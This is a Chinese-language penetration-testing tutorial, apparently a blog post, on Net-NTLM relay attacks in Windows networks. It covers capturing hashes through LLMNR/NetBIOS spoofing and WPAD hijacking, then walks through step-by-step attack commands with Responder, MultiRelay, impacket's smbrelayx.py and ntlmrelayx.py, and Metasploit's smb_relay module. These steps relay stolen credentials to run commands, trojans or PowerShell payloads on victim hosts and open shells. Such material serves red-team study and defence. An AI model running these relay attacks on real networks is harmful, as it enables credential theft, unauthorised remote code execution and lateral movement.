(Net-)NTLM Relay(重放)

原理

截获的Net-NTLM Hash重放来进行攻击,从而实现对其他机器的控制。例:

域内A访问B,攻击者C作为中间人,骗取A的身份凭证访问B(骗取过程可用建立smb服务器诱导登录等)

或A请求了一个不存在的账户,导致凭证经过了伪造的服务器

前提

smb认证获取的机器没有开启smb签名(默认普通主机不开,DC开,cve-2019-1040绕过了该限制)

支持协议:SMB、HTTP、LDAP、MSSQL、Exchange等

获取Net-NTLM Hash

LLMNR和NetBIOS欺骗

Windows系统名称解析顺序为 :

1)本地hosts文件(%windir%\System32\drivers\etc\hosts)

2)DNS缓存/DNS服务器

3)链路本地多播名称解析(LLMNR)和NetBIOS名称服务(NBT-NS)

当本地缓存没找到名称,DNS服务器又请求失败,Windows就会通过LLMNR与Net-BIOS在本地进行名称解析。

客户端会将未认证的UDP广播到网络进行询问,从而使攻击者可以声明自己为受害者目标机器,从而让其交出凭证

(攻击本质是中间人)

WPAD劫持

WPAD (网络代理自动发现协议)是一种客户端使用DCHP、DNS、LLMNR、NBNS协议定位一个代理配置文件(PAC)URL的方法。

WPAD通过让浏览器自动发现代理服务器,查找存放PAC 文件的主机来定位代理配置文件,下载编译并运行,最终自动使用代理访问网络

典例:利用LLMNR/NBNS欺骗让受害者从攻击者获取PAC文件,PAC文件指定攻击者为代理服务器,

然后攻击者就可劫持受害者的HTTP流量,在其中插入任意HTML标签从而获得其Net-NTLMHash

当浏览器设置为 “自动检测代理设置”,它就会下载攻击者事先准备好的wpad.dat文件,使客户端的流量经过攻击者

Msf

metasploit中的auxiliary/docx/word_unc_injector会创建一个带有uac路径的word文件,当该文件被打开的时候kali就会收到NTLMv2 hash。

其他方式

暴力破解,文件包含、XSS等传统漏洞

用法:https://www.jianshu.com/p/1b545a8b8b1e

工具

responder(Python编写)

下载:GitHub - lgandx/Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

Inveigh(powershell编写)

下载:GitHub - Kevin-Robertson/Inveigh: .NET IPv4/IPv6 machine-in-the-middle tool for penetration testers

用法:NTLM-relay攻击的原理与实现_Shanfenglan7的博客-CSDN博客_ntlmssp攻击原理

impacket

SMB_Relay

工作组环境

由于各主机无信任关系,只在自己的SAM存密码,所以Relay到别人无意义,只能Relay到自己

MS08-068漏洞修复后,除CVE-2019-1384(Ghost Potato)外无法Relay到自己

域环境

MultiRelayx(responder)

1)扫描域内机器SMB签名开放情况:./RunFinger.py -i IP/24
2)若签名为false,开启攻击监听: python MultiRelay.py -t <被攻击IP> -u ALL
3)修改responder的配置文件 Responder.conf,不让其对 hash 进行抓取:将SMB和HTTP的On改为Off
4)启用LLMNR和NetBIOS请求监听:responder(.py) -i eth1
5)域内任意主机A输入:net use \\\\不存在的主机名 ,即可使用A的凭证控制被攻击主机

smbrelayx.py(impacket)

1)攻击者 ./smbrelayx.py -h <受害者 IP> -c Command
2) 域内任意主机 net use \\\\攻击者\\c$
其中-c 后可跟payload或**本地木马**,如 -e ./shell.exe
msf监听需设置: set AutoRunScript migrate -n explorer.exe
(迁移进程到资源管理器,否则session会随木马自动清除而关闭)

ntlmrelayx.py(impacket)

可直接使用已有hash重放指定机器: ./ntlmrelayx.py -t <指定的被攻击 IP> 
1)./ntlmrelayx.py -t smb://被害IP -c whoami -smb2support
2)其他人访问攻击者smb或http服务交出凭据

利用responder:
1) ntlmrelayx.py -t 受害IP -c 'powershell payload'
2)responder 关掉 smb 和 http后启动:responder(.py) -i eth1
3)任意主机  net use \\\\whoami  产生smb流量

msf中windows/smb/smb_relay模块(ms08-068?)

参数设置完run后,被害者需访问攻击者的smb服务,即可弹shell

(该模块只支持NTLMv1,所以在攻击有些机器会出现“Failed to authenticate”)

基于其他的攻击方式(EWS、LDAP)

Windows内网协议学习NTLM篇之Net-NTLM利用 - 安全客,安全资讯平台

参考

原文:内网渗透测试:NTLM Relay攻击分析_whatday的博客-CSDN博客_ntlmrelayx

原文拓展:https://www.jianshu.com/p/c7d8e7d9c03c

另一篇:NTLM-relay攻击的原理与实现_Shanfenglan7的博客-CSDN博客_ntlmssp攻击原理

你可能感兴趣的:(内网横移,网络,windows,运维)